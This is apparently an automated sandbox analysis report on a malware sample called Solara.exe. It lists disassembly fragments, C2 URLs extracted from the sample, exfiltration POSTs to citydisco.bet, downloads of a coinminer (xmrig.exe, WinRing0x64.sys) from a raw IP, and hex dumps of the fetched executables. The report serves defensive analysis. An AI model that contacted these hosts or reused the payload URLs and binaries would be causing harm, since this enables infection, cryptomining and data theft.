Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+4Ch]	2_2_00442800
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-1AB210DCh]	2_2_0040D830
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-30h]	2_2_004490C0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edi, byte ptr [ebx+ecx]	2_2_0044816C
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov dword ptr [esp], eax	2_2_00410993
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+35B9B860h]	2_2_0041BAC1
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-56B7A16Ch]	2_2_0041BAC1
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ebp+02h]	2_2_00429460
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov word ptr [ecx], dx	2_2_00448CC3
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then lea edi, dword ptr [eax-0000008Ah]	2_2_0044BCE0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp word ptr [edi+ebx], 0000h	2_2_0044AE40
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then push edi	2_2_00411E2A
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+0Ch]	2_2_00420EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ebp, byte ptr [esp+ecx-19B91E8Ah]	2_2_00420EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], CA198B66h	2_2_00420EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+2Ch]	2_2_00420EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 6D58C181h	2_2_00420EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp dword ptr [edi+edx*8], 93A82FD1h	2_2_00420EA0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-42h]	2_2_0042F760
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]	2_2_0042F760
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then lea ebp, dword ptr [edx+ecx]	2_2_0042F760
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then inc ebx	2_2_00401040
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov dword ptr [esp], edx	2_2_0044B840
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-58D31E9Ah]	2_2_00431850
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov eax, ebx	2_2_00424030
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_004208F5
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then jmp dword ptr [00451774h]	2_2_0041F888
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov word ptr [eax], dx	2_2_00420091
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-00000088h]	2_2_004288A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp word ptr [edi+eax+02h], 0000h	2_2_004288A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov word ptr [eax], cx	2_2_004288A0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_0041312E
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov word ptr [ecx], si	2_2_004201C3
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	2_2_0040A1E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	2_2_0040A1E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx eax, byte ptr [ecx+esi]	2_2_0040B240
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esi+eax+25E74604h]	2_2_004112E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp word ptr [ecx+eax+02h], 0000h	2_2_0042031B
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+454B1CDCh]	2_2_0040D3D0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov dword ptr [esi+04h], edx	2_2_004113E2
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then push edi	2_2_004313F7
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax-099F648Ah]	2_2_0042FB80
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movsx edx, byte ptr [esi+eax]	2_2_0041AC10
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 8D94E5DFh	2_2_0041ACD0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 53991D4Eh	2_2_0041ACD0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx-041B93BAh]	2_2_0040C4E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then and esi, 80000000h	2_2_0040BC80
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then push ebx	2_2_0041FC88
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+10h]	2_2_0040FCB0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov dword ptr [esp+18h], ecx	2_2_0041D4B8
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	2_2_00444542
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	2_2_0043FD70
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	2_2_00446D30
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+04h]	2_2_00446D30
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax]	2_2_00446D30
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx-00000092h]	2_2_0042FDCC
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5AE16A62h]	2_2_004485D1
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]	2_2_0042ED90
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E745FCh]	2_2_0042ED90
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+4E981752h]	2_2_0041E5BB
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov byte ptr [edx], al	2_2_00423612
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	2_2_004336C0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+08BA2EA8h]	2_2_004236E0
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+25E74604h]	2_2_004326FC
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then mov byte ptr [ecx], al	2_2_00437682
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edi, byte ptr [eax+ecx+61250952h]	2_2_00432E9E
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then push edi	2_2_00431775
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx esi, byte ptr [edx]	2_2_00431FCA
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edi, byte ptr [ecx+esi]	2_2_00402780
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+24h]	2_2_0041EF9E
Source: C:\Users\user\Desktop\Solara.exe.bin.exe	Code function: 4x nop then movzx edi, byte ptr [esp+eax]	2_2_0043F7B0
Source: C:\Users\user\AppData\Local\Temp\Z6T9189FJQPDA5HSM49.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	8_2_01554668

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: citydisco.bet/gdJIS
Source: Malware configuration extractor	URLs: featureccus.shop/bdMAn
Source: Malware configuration extractor	URLs: mrodularmall.top/aNzS
Source: Malware configuration extractor	URLs: jowinjoinery.icu/bdWUa
Source: Malware configuration extractor	URLs: legenassedk.top/bdpWO
Source: Malware configuration extractor	URLs: htardwarehu.icu/Sbdsa
Source: Malware configuration extractor	URLs: cjlaspcorne.icu/DbIps
Source: Malware configuration extractor	URLs: bugildbett.top/bAuz

Connects to a pastebin service (likely for C&C)

Source: unknown

DNS query: name: pastebin.com

Source: global traffic

TCP traffic: 192.168.2.8:64658 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Mar 2025 13:22:28 GMTContent-Type: application/octet-streamContent-Length: 21504Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-5400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 7a 58 21 9a 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 48 00 00 00 0a 00 00 00 00 00 00 3a 66 00 00 00 20 00 00 00 80 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 00 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e7 65 00 00 4f 00 00 00 00 80 00 00 b8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 0c 00 00 00 34 65 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 40 46 00 00 00 20 00 00 00 48 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 b8 06 00 00 00 80 00 00 00 08 00 00 00 4a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 00 00 00 02 00 00 00 52 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 66 00 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 36 00 00 dc 2c 00 00 03 00 02 00 10 00 00 06 c4 63 00 00 70 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 13 30 04 00 b5 00 00 00 01 00 00 11 02 14 7d 1c 00 00 04 02 28 14 00 00 0a 00 00 02 28 06 00 00 06 00 28 05 00 00 06 00 28 03 00 00 06 00 02 28 0b 00 00 06 00 02 28 0a 00 00 06 00 7e 19 00 00 04 72 01 00 00 70 6f 15 00 00 0a 0a 06 2c 30 00 7e 03 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 7e 0f 00 00 04 7e 12 00 00 04 72 23 00 00 70 16 28 04 00 00 06 00 00 2b 18 00 7e 02 00 00 04 7e 12 00 00 04 72 07 00 00 70 16 28 04 00 00 06 00 00 7e 01 00 00 04 7e 12 00 00 04 72 43 00 00 70 16 28 04 00 00 06 00 28 08 00 00 06 00 28 0c 00 00 06 00 02 28 0e 00 00 06 00 2a 00 00 00 13 30 03 00 21 00 00 00 02 00 00 11 00 02 28 16 00 00 0a 0a 06 25 6f 17 00 00 0a 20 80 00 00 00 60 6f 18 00 00 0a 00 06 0b 2b 00 07 2a 00 00 00 1b 30 04 00 a7 01 00 00 03 00 00 11 00 00 20 00 0f 00 00 28 19 00 00 0a 00 20 10 27 00 00 8d 31 00 00 01 0a 16 0b 16 0c 73 1a 00 00 0a 0d 09 7e 10 00 00 04 6f 1b 00 00 0a 13 04 11 04 73 1c 00 00 0a 13 05 00 06 16 72 5b
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Mar 2025 13:22:33 GMTContent-Type: application/octet-streamContent-Length: 8251392Last-Modified: Wed, 15 Jan 2025 19:13:17 GMTConnection: keep-aliveETag: "678808cd-7de800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 db 63 a2 64 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 02 26 00 10 5f 00 00 d8 7d 00 00 0c 32 00 d0 14 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 30 b0 00 00 10 00 00 4c 7c 7e 00 03 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 d0 ae 00 d8 46 00 00 00 40 af 00 e8 5c 00 00 00 10 76 00 9c ee 02 00 00 00 00 00 00 00 00 00 00 a0 af 00 6c 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 19 74 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1c e0 ae 00 40 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a0 0a 5f 00 00 10 00 00 00 10 5f 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 04 01 00 00 20 5f 00 00 06 01 00 00 20 5f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 e0 dc 15 00 00 30 60 00 00 de 15 00 00 26 60 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 9c ee 02 00 00 10 76 00 00 f0 02 00 00 04 76 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 14 b9 03 00 00 00 79 00 00 ba 03 00 00 f4 78 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 e0 0a 32 00 00 c0 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 d8 46 00 00 00 d0 ae 00 00 48 00 00 00 ae 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 68 00 00 00 00 20 af 00 00 02 00 00 00 f6 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 30 af 00 00 02 00 00 00 f8 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e8 5c 00 00 00 40 af 00 e8 5c 00 00 00 fa 7c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 8e 00 00 00 a0 af 00 00 90 00 00 00 58 7d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Mar 2025 13:22:33 GMTContent-Type: application/octet-streamContent-Length: 14544Last-Modified: Wed, 15 Jan 2025 19:13:16 GMTConnection: keep-aliveETag: "678808cc-38d0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 35 3a 6e fc 71 5b 00 af 71 5b 00 af 71 5b 00 af 71 5b 01 af 7d 5b 00 af 56 9d 7b af 74 5b 00 af 56 9d 7d af 70 5b 00 af 56 9d 6d af 72 5b 00 af 56 9d 71 af 70 5b 00 af 56 9d 7c af 70 5b 00 af 56 9d 78 af 70 5b 00 af 52 69 63 68 71 5b 00 af 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 c1 26 8b 48 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 08 00 00 0c 00 00 00 0a 00 00 00 00 00 00 08 50 00 00 00 10 00 00 00 00 01 00 00 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 06 00 00 00 00 00 00 00 00 70 00 00 00 04 00 00 08 19 01 00 01 00 00 00 00 00 04 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 64 50 00 00 3c 00 00 00 00 60 00 00 c0 03 00 00 00 40 00 00 60 00 00 00 00 1a 00 00 d0 1e 00 00 00 00 00 00 00 00 00 00 70 20 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 70 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 c6 06 00 00 00 10 00 00 00 08 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 68 2e 72 64 61 74 61 00 00 7c 01 00 00 00 20 00 00 00 02 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 2e 64 61 74 61 00 00 00 14 01 00 00 00 30 00 00 00 02 00 00 00 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c8 2e 70 64 61 74 61 00 00 60 00 00 00 00 40 00 00 00 02 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 48 49 4e 49 54 00 00 00 00 22 02 00 00 00 50 00 00 00 04 00 00 00 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 e2 2e 72 73 72 63 00 00 00 c0 03 00 00 00 60 00 00 00 04 00 00 00 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /raw/YpJeSRBC HTTP/1.1Host: pastebin.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /conhost.exe HTTP/1.1Connection: Keep-AliveHost: 185.215.113.51
Source: global traffic	HTTP traffic detected: GET /xmrig.exe HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /WinRing0x64.sys HTTP/1.1Host: 185.215.113.51Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 104.20.4.235 104.20.4.235
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 185.215.113.51 185.215.113.51

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49684 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49682 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49686 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49693 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49692 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49690 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.8:49691 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2829056 - Severity 2 - ETPRO MALWARE Observed Request for xmrig.exe in - Coinminer Download : 192.168.2.8:49697 -> 185.215.113.51:80

Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 55Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6m2667r5fsUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 14485Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=8QKCff6wSl3pKUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15046Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=AMzQ0rF90g5UT0wuUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20230Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Kz43rOp8CpCh1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 2474Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2y0o3NwK2wtH7ogauUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 570576Host: citydisco.bet
Source: global traffic	HTTP traffic detected: POST /gdJIS HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 93Host: citydisco.bet

Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
Source: unknown	TCP traffic detected without corresponding DNS query: 185.215.113.51
